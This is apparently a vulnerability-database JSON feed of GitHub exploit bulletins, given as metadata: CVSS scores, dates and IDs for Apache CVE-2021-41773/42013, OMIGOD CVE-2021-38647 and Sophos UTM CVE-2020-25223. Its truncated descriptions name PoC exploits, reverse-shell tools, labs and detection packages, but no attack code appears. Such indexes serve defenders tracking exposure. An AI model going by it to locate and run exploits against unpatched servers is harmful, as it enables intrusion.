{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T22:07:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-04-05T05:17:33", "id": "A8616E5E-04F8-56D8-ACB4-32FDF7F66EED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:11:27", "description": "# CVE-2021-42013\n\nThis is the deployment for Apache 2.4.50 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-25T09:07:00", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:38:27", "id": "68A13FF0-60E5-5A29-9248-83A940B0FB02", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773-Playground\nSome docker images to play with CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-04T22:52:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-11T09:06:38", "id": 
"86360765-0B1A-5D73-A805-BAE8F1B5D16D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773|CVE-2021-42013: Path Traversal Zero-Day in Apac...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T14:58:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-07T19:19:39", "id": "A2D97DCC-04C2-5CB1-921F-709AA8D7FD9A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:27:46", "description": "## \u6f0f\u6d1e\u540d\u79f0\n\nApache \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c \uff08CVE-2021-42013\uff09\n\n## \u6f0f\u6d1e\u63cf\u8ff0\n\nApache HTTP Se...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-23T14:46:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-08T16:14:48", "id": "78787F63-0356-51EC-B32A-B9BD114431C3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-04T01:18:36", "description": "# CVE-2021-41773\n\n## Usage\n\n```bash\ndocker-compose up --build vu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-27T22:39:58", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-04T00:11:58", "id": "6CAA7558-723B-5286-9840-4DF4EB48E0AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\n\nA Zeek package which raises notices for Path T...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T06:54:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-28T05:48:41", "id": "805E6B24-8DF9-51D8-8DF6-6658161F96EA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 and 
CVE-2021-42013 Lab Setup\n\n## Setup \n```\n$ g...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-18T12:01:58", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-12-10T06:09:44", "id": "BF9B0898-784E-5B5E-9505-430B58C1E6B8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-28T21:50:54", "description": "# SimplesApachePathTraversal\n\n\n\n<p align=\"center\">\n<a href=\"http...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-13T17:03:56", "type": "githubexploit", "title": "Exploit for Files or 
## Related GitHub exploit records

The remainder of the page is a list of `githubexploit` bulletins (`bulletinFamily: exploit`) aggregated for CVE-2020-17519, CVE-2020-25223, CVE-2021-38647, CVE-2021-41773 and CVE-2021-42013, each with its CVSS v2 and v3.1 scoring. Every record carries the same constant fields: `href` is empty, `privateArea` is 1, and `obtainAllPrivilege`, `obtainUserPrivilege`, `obtainOtherPrivilege`, `userInteractionRequired` and `acInsufInfo` are all false. The vectors, and the sub-scores that accompany them, take only five forms:

- CVSS v3.1 9.8 CRITICAL: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` (exploitability 3.9, impact 5.9)
- CVSS v3.1 7.5 HIGH: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` (exploitability 3.9, impact 3.6)
- CVSS v2 10.0 HIGH: `AV:N/AC:L/Au:N/C:C/I:C/A:C` (exploitability 10.0, impact 10.0)
- CVSS v2 7.5 HIGH: `AV:N/AC:L/Au:N/C:P/I:P/A:P` (exploitability 10.0, impact 6.4)
- CVSS v2 4.3 MEDIUM: `AV:N/AC:M/Au:N/C:P/I:N/A:N` (exploitability 8.6, impact 2.9)

The first and last records are truncated; only their surviving fields are listed.

| Title | Repository README (excerpt) | CVE(s) | Published | Modified | CVSS v3.1 | CVSS v2 | Record id |
|---|---|---|---|---|---|---|---|
| …Directories Accessible to External Parties in Apache Flink | … | CVE-2021-42013, CVE-2021-41773, CVE-2020-17519 | … | 2022-02-28T17:25:24 | … | 7.5 HIGH | 11813536-2AFF-5EA4-B09F-E9EB340DDD26 |
| Exploit for OS Command Injection in Sophos Unified Threat Management | sophucked: CVE-2020-25223 RCE PoC, gets reverse shell. Pre-auth… | CVE-2020-25223 | 2021-08-29T11:08:53 | 2022-05-19T11:27:41 | 9.8 CRITICAL | 10.0 HIGH | AD440E9E-3A07-5AB3-99A0-11DD4C08AF47 |
| Exploit for OS Command Injection in Sophos Unified Threat Management | CVE-2020-25223: A PoC script for testing CVE-2020-2… | CVE-2020-25223 | 2021-09-09T15:58:08 | 2022-04-12T05:57:11 | 9.8 CRITICAL | 10.0 HIGH | 9F5B4253-EC2A-5A25-AB3C-CB76E45F7923 |
| Exploit for Improper Initialization in Microsoft | cve-2021-38647: https://github.com/corelight/CVE-2021-38647 wit… | CVE-2021-38647 | 2021-09-22T15:20:40 | 2021-09-22T15:29:15 | 9.8 CRITICAL | 7.5 HIGH | 610ADCD3-C281-52D4-A546-467569FE3AC1 |
| Exploit for Improper Initialization in Microsoft | omigood (OM I GOOD?): This repository contains a free scanner… | CVE-2021-38647 | 2021-09-16T15:34:03 | 2022-07-13T20:33:30 | 9.8 CRITICAL | 7.5 HIGH | A6B7D4D8-4578-5AD8-961D-3BC35007FF29 |
| Exploit for Improper Initialization in Microsoft | Details / OMIGod - CVE-2021-38647: Open Management Infrastruct… | CVE-2021-38647 | 2021-09-19T15:43:32 | 2022-08-10T05:21:40 | 9.8 CRITICAL | 7.5 HIGH | 64DFB465-6754-5E4B-B311-7668EDD4D962 |
| Exploit for Improper Initialization in Microsoft | cve-2021-38647: A PoC exploit for CVE-2021-38647 RCE in OMI. E… | CVE-2021-38647 | 2021-09-16T08:33:02 | 2021-09-29T12:13:38 | 9.8 CRITICAL | 7.5 HIGH | 8B4EDA16-9E27-500D-B648-9C3AD4295562 |
| Exploit for Improper Initialization in Microsoft | OMIGOD: Proof of Concept Exploit for CVE-2021-38647 (OMIGOD). F… | CVE-2021-38647 | 2021-09-16T02:11:36 | 2022-08-17T05:00:10 | 9.8 CRITICAL | 7.5 HIGH | BF40B403-9D06-5460-8B40-3FC2E56A4A07 |
| Exploit for Vulnerability in Microsoft | CVE-2021-38647: This is a POC for CVE-2021-38647: Send a PO… | CVE-2021-38647 | 2021-09-15T21:44:30 | 2021-09-19T05:39:40 | 9.8 CRITICAL | 7.5 HIGH | 1EC6324C-A18E-517A-9A55-F1C2D1BCA358 |
| Exploit for Vulnerability in Microsoft | OMIGOD_cve-2021-38647: CVE-2021-38647 is an unauthentica… | CVE-2021-38647 | 2021-09-24T10:53:52 | 2021-10-10T08:48:26 | 9.8 CRITICAL | 7.5 HIGH | 54D698B4-9CF0-5D7F-88D2-1053A11EA7C3 |
| Exploit for Vulnerability in Microsoft | Readme: An educational lab VM to learn about the 9.6 CVSS unau… | CVE-2021-38647 | 2021-09-18T15:25:18 | 2021-09-27T11:34:25 | 9.8 CRITICAL | 7.5 HIGH | 09412330-832C-538A-A226-61474048E41B |
| Exploit for Improper Initialization in Microsoft | CVE-2021-38647: Omigod: Another exploit for Omigod written quic… | CVE-2021-38647 | 2021-09-26T18:06:00 | 2021-10-29T10:57:34 | 9.8 CRITICAL | 7.5 HIGH | A99AB73C-8E46-5B9C-A402-F78F96EE2327 |
| Exploit for Improper Initialization in Microsoft | CVE-2021-38647: CVE-2021-38647 - POC to exploit unauthenticate… | CVE-2021-38647 | 2021-09-20T16:29:48 | 2022-08-09T18:59:00 | 9.8 CRITICAL | 7.5 HIGH | FA1DEEA0-A8AF-5C21-98E6-9D3379266529 |
| Exploit for Improper Initialization in Microsoft | OMIGOD PoC / Usage: `$ go run CVE-2021-38647.go -h` USAGE… | CVE-2021-38647 | 2021-09-22T01:05:22 | 2021-09-22T22:40:10 | 9.8 CRITICAL | 7.5 HIGH | CE2FB7D7-ABCF-58F8-AACC-D0E6FEE8865A |
| Exploit for Improper Initialization in Microsoft | CVE-2021-38647 AKA "OMIGOD": A Zeek package which detects CVE-2… | CVE-2021-38647 | 2021-09-15T04:51:02 | 2022-02-11T01:13:18 | 9.8 CRITICAL | 7.5 HIGH | 8217668C-9748-5511-8C01-7E933D69F872 |
| Exploit for Path Traversal in Apache Http Server | CVE-2021-42013 - Apache HTTP Server 2.4.50 / How to run… | CVE-2021-42013 | 2021-10-20T15:32:39 | 2021-10-23T13:16:56 | 9.8 CRITICAL | 7.5 HIGH | 5312D04F-9490-5472-84FA-86B3BBDC8928 |
| Exploit for Path Traversal in Apache Http Server | CVE-2021-42013 / Poc CVE-2021-42013 - Apache 2.4.50 w… | CVE-2021-42013 | 2021-10-23T21:58:44 | 2022-08-29T22:56:33 | 9.8 CRITICAL | 7.5 HIGH | 22DCCD26-B68C-5905-BAC2-71D10DE3F123 |
| Exploit for Path Traversal in Apache Http Server | cve-2021-42013: Apache 2.4.50 Path traversal vulnerab… | CVE-2021-42013 | 2021-10-08T05:44:54 | 2022-07-04T15:27:56 | 9.8 CRITICAL | 7.5 HIGH | 6BCBA83C-4A4C-58D7-92E4-DF092DFEF267 |
| Exploit for Path Traversal in Apache Http Server | Apache 2.4.50 - Path Traversal or Remote Code Execution: cve-20… | CVE-2021-42013 | 2022-09-15T12:15:00 | 2022-09-15T12:15:18 | 9.8 CRITICAL | 7.5 HIGH | 9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5 |
| Exploit for Path Traversal in Apache Http Server | cve-2021-42013: Apache 2.4.50 Path traversal vulnerabi… | CVE-2021-42013 | 2022-09-15T11:35:00 | 2022-09-15T11:35:00 | 9.8 CRITICAL | 7.5 HIGH | E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6 |
| Exploit for Path Traversal in Apache Http Server | Apache 2.4.50 - Path Traversal or Remote Code Execution: cve-20… | CVE-2021-42013 | 2022-09-15T11:28:39 | 2022-09-15T11:28:51 | 9.8 CRITICAL | 7.5 HIGH | CC15AE65-B697-525A-AF4B-38B1501CAB49 |
| Exploit for Path Traversal in Apache Http Server | CVE-2021-42013-LAB: Apache HTTP Server 2.4.50 - RCE Lab. **exp… | CVE-2021-42013 | 2022-02-03T13:26:05 | 2022-02-20T23:15:08 | 9.8 CRITICAL | 7.5 HIGH | 6A0A657E-8300-5312-99CE-E11F460B1DBF |
| Exploit for Path Traversal in Apache Http Server | CVE-2021-42013: Apache 2.4.49-50 Remote Code Ex… | CVE-2021-42013 | 2022-07-28T09:21:50 | 2022-07-28T09:24:11 | 9.8 CRITICAL | 7.5 HIGH | 4051D2EF-1C43-576D-ADB2-B519B31F93A0 |
| Exploit for Path Traversal in Apache Http Server | CVE-2021-42013: C implementation of the infamous [Apache 2.4.50… | CVE-2021-42013 | 2022-05-31T03:28:20 | 2022-05-31T03:29:22 | 9.8 CRITICAL | 7.5 HIGH | 61075B23-F713-537A-9B84-7EB9B96CF228 |
| Exploit for Path Traversal in Apache Http Server | apache-exploit-CVE-20… | CVE-2021-42013 | 2021-10-07T18:31:29 | 2022-04-09T05:38:40 | 9.8 CRITICAL | 7.5 HIGH | 2A177215-CE4A-5FA7-B016-EEAF332D165C |
| Exploit for Path Traversal in Apache Http Server | CVE-2021-42013_Reverse-Shell: PoC CVE-2021-42013 reverse shell… | CVE-2021-42013 | 2021-10-24T12:57:55 | 2022-03-27T07:43:58 | 9.8 CRITICAL | 7.5 HIGH | 8713FD59-264B-5FD7-8429-3251AB5AB3B8 |
| Exploit for Path Traversal in Apache Http Server | CVE-2021-42013: Apache 2.4.49-50 Remote Code Ex… | CVE-2021-42013 | 2022-07-28T09:21:50 | 2022-07-28T09:24:11 | 9.8 CRITICAL | 7.5 HIGH | E81474F6-6DDC-5FC2-828A-812A8815E3B4 |
| Exploit for Path Traversal in Apache Http Server | Apache 2.4.50 - Path Traversal or Remote Code Execution: CVE-20… | CVE-2021-42013 | 2021-10-27T14:29:10 | 2023-02-10T09:20:38 | 9.8 CRITICAL | 7.5 HIGH | 52E13088-9643-5E81-B0A0-B7478BCF1F2C |
| Exploit for Path Traversal in Apache Http Server | CVE-2021-41773_Ex… | CVE-2021-41773 | 2021-12-26T16:48:57 | 2022-08-10T09:07:10 | 7.5 HIGH | 4.3 MEDIUM | FDF4BBB1-979C-5320-95EA-9EC7EB064D72 |
| Exploit for Path Traversal in Apache Http Server | CVE-2021-41773 (README opens with an HTML `<p align="center"><img …>` banner) | CVE-2021-41773 | 2021-10-12T00:51:32 | 2021-10-18T15:37:03 | 7.5 HIGH | 4.3 MEDIUM | 4B44115D-85A3-5E62-B9A8-5F336C24673F |
| … | HTML page (`<!DOCTYPE html><html dir="rtl" lang="fa-IR">`…) | … | … | … | 7.5 HIGH | … | … |
"userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-14T04:08:56", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2022-03-14T04:09:11", "id": "0AA6A425-25B1-5D2A-ABA1-2933D3E1DC56", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773\nPath Traversal for Apache 2.4.49\n\n## Affected b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T21:37:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-20T23:04:09", "id": "E6B39247-8016-5007-B505-699F05FCA1B5", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 - Apache HTTP Server 2.4.49\n\n# Cara Menjalankan...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-20T14:41:15", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-23T13:15:51", "id": "C0380E16-C468-5540-A427-7FE34E7CF36B", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2023-02-08T18:31:08", "description": "# CVE-2021-41773\n### Poc CVE-2021-41773 - Apache 2.4.49 ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-23T21:37:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773"], "modified": "2021-10-23T23:15:50", "id": "C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2023-02-08T18:31:15", "description": "# Apache 2.4.49 - Path Traversal or Remote Code Execution\ncve-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-23T12:31:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
